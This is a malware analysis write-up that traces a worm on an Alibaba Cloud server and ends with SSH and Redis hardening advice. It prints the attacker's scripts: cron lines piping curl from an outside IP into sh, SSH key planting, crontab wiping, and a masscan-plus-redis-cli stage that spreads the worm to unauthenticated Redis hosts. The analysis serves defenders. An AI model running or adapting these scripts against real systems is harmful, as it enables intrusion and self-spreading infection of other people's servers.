Inside the gpg-agentd Malware that Hijacked an Alibaba Cloud Server

Background

Server on Alibaba Cloud (CentOS 6.x) was frozen for malicious outbound traffic. SSH port 22 was blocked; after changing the port, root login succeeded with a weak password, indicating a compromise.

Initial Indicators

Process list showed two CPU‑intensive processes named gpg-agentd. The trailing “d” suggested a masquerading daemon. Examination of PID 23374 revealed the binary location and network connections.

Malicious Cron Job

Crontab contained entries that download and execute ash.php every 15‑20 minutes:

*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh
*/20 * * * * curl -fsSL 159.89.190.243/ash.php|sh

First Script (ash.sh)

The script performs the following actions:

Disables SELinux ( setenforce 0).

Raises file‑descriptor and process limits ( ulimit -n 50000, ulimit -u 50000).

Clears existing cron files and recreates the cron directory.

Creates /root/.ssh/authorized_keys with an attacker‑controlled RSA key.

Installs bash via yum or apt if missing.

Downloads and executes a second script bsh.php from the same server.

uname -aid
hostnames
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
crontab -r 2>/dev/null
rm -rf /var/spool/cron/* 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
mkdir -p /root/.ssh 2>/dev/null
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/... redis' > /root/.ssh/authorized_keys
yum install -y bash 2>/dev/null
apt install -y bash 2>/dev/null
apt-get install -y bash 2>/dev/null
bash -c 'curl -fsSL 159.89.190.243/bsh.php|bash' 2>/dev/null

Second Script (bsh.php)

This script expands the infection:

Downloads additional binaries, makes them executable, and adds them to /etc/rc.local for persistence.

Installs the open‑source port scanner masscan from GitHub (https://github.com/robertdavidgraham/masscan) and its build dependencies.

Modifies Redis configuration to write arbitrary data to files, enabling SSH key injection.

Downloads and runs a third script rsh.php.

curl -fsSL 159.89.190.243/ash.php > ash.sh
# install masscan
curl -sL -o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz
[ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4
# execute third stage
bash -c 'curl -fsSL 159.89.190.243/rsh.php|bash'

Third Script (rsh.php)

Final stage focuses on abusing unauthenticated Redis instances:

Disables SELinux and raises limits again.

Sets up iptables rules to block external access to port 6379 while allowing localhost.

Uses CONFIG SET dbfilename and CONFIG SET dir to write a cron entry containing the attacker’s SSH key into /var/spool/cron/ and /var/spool/cron/crontabs.

Runs masscan at a high rate (up to 10 000 packets/s) to discover open Redis ports (6379, 6380) across the Internet and internal subnets.

For each discovered host, executes redis-cli to inject the malicious configuration, thereby propagating the infection.

setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
echo 'config set dbfilename "backup.db"' > .da
echo 'save' >> .da
echo 'flushall' >> .da
echo 'set backup1 "*/2 * * * * curl -fsSL http://159.89.190.243/ash.php | sh"' >> .da
masscan --max-rate 10000 -p6379,6380 -iL .inet | awk '{print $6, substr($4,1,length($4)-4)}' | sort | uniq > .lan
while read -r h p; do
  cat .dat | redis-cli -h $h -p $p --raw >/dev/null &
 done < .lan
rm -rf .dat .shard .ranges .lan

Propagation Mechanism

The chain works as follows:

Initial brute‑force of the root account (evidenced by many lastb entries).

Deployment of a disguised gpg-agentd daemon that pulls scripts via cron.

Persistence through SSH key injection and rc.local modifications.

Mass scanning of the Internet for unauthenticated Redis instances using masscan .

Exploitation of Redis’s ability to write its dump file to an arbitrary path, allowing the attacker to plant SSH keys and further cron jobs, leading to exponential spread.

Embedded strings related to cryptocurrency mining (e.g., references to nicehash.com) suggest the ultimate payload may be a miner.

Mitigation Recommendations

Server hardening

Disable direct root SSH login; use a non‑privileged account.

Enforce strong, complex passwords or, preferably, key‑based authentication.

Change the default SSH port and restrict it with firewall rules.

Deploy brute‑force protection tools such as DenyHosts or fail2ban.

Remove unnecessary services and keep the system patched.

Redis hardening

Bind Redis only to localhost or internal interfaces; avoid 0.0.0.0.

Configure a strong password with the requirepass directive.

Run Redis under a low‑privilege, non‑root user.

Disable or restrict the CONFIG command for untrusted clients.

Applying these controls reduces the attack surface exploited by the described malware chain.